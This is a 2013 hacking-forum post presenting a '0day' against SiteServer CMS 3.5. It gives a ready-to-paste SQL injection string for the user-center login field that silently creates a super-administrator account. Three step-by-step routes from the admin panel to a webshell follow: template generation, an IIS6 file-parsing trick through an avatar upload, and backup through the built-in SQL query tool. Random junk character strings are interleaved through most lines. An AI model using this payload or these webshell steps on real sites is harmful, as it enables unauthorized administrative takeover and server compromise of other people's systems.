找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2256|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版  b" M/ k( D+ n1 y, w: b  m& }- z' I

- M5 E6 p& Q. z8 |0 Rstieserver官网:www.siteserver.cn
& H; H0 `8 L; i- B, o
9 l0 W2 Q2 y- A% X # q1 u- C* L& |( h7 Z$ g
: O) ^- J* J7 s
EXP:+ Q4 d% `8 l' K% T& s
# Z0 O; R& m- e- h& J5 i5 f) _
直接访问UserCenter/login.aspx
" x1 j4 L2 R0 m' G; M
+ A  a9 Y% L" m/ h$ N1 c% i 6 I- \5 G% C$ z% D

% n( Z* R, E$ Q# n4 v) r2 Z用户名处输入:6 `6 q% P' a' X. V) q* G$ s

0 _4 ]  Y( v# D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ T" |* M: o8 ^# d$ K3 M& {9 P9 f/ k3 L

1 N# S& K7 ?, A0 j
1 z4 Q" B7 W: P* t密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。0 u) `; [6 e7 s

8 z" f. {2 Q# A1 V
4 g3 P( [$ r) h, `+ N8 v: F) p5 U6 y
之后再访问后台SiteServer/login.aspx用插入的用户登陆- a5 }1 A" c. M5 S  {  M

5 N' Q% \, \0 A* `( \' k+ {4 d 7 P+ c  d2 f  w) n6 q+ I4 u  }- ~

+ q7 a( a3 ^+ Y; O& r, O后台拿webshell的三种方法:
) d' [( D" [* ~( A( |: Q9 v
0 X/ g$ g3 ^& S' s$ }一、  Q+ l$ c8 |0 F+ }/ o
, w0 L* Z: q# @
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 ?: z7 h* v" `/ |, Z0 J+ h4 N. z9 M3 P+ j3 I! }
二、
' N. s6 u; f# \+ J
- r$ O+ z5 |0 `, X9 Z4 S成员权限-》添加用户-》用户名为:1.asp$ F0 N9 I6 R  j" s, s5 w9 _+ ]
0 z7 x0 W- Z0 l5 Z, f+ f
http://127.0.0.1/usercenter/
7 s3 H  _. {3 U* Q' g% d3 w% ]! G  a/ f, o7 N# E4 X7 B
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
& g, |6 E) B% E$ G
, D; k( t( i# u2 ~0 n6 `(ps:后台添加用户时不会验证是否含有非法字符)
  c& [* ^" F: F' [* Y7 }, Q
  ~! z" j( I% g* B& |4 _/ D' t) v三、$ o3 R6 Y* f0 E

8 w* F1 ~( q/ m' \系统工具-》实用工具-》机器参数查看
& R! r: w- S5 w# f8 s0 D( l可以看到数据库类型、名称,WEB路径
, d& q7 o, a0 \: h
* K  ?( d- S3 j5 J' P  S系统工具-》数据库工具-》SQL语句查询$ E5 }/ w' j$ [" M" e8 l
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。) S- s$ M. T* A7 a2 t! `( D7 k
; E( d: j8 M$ |" k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表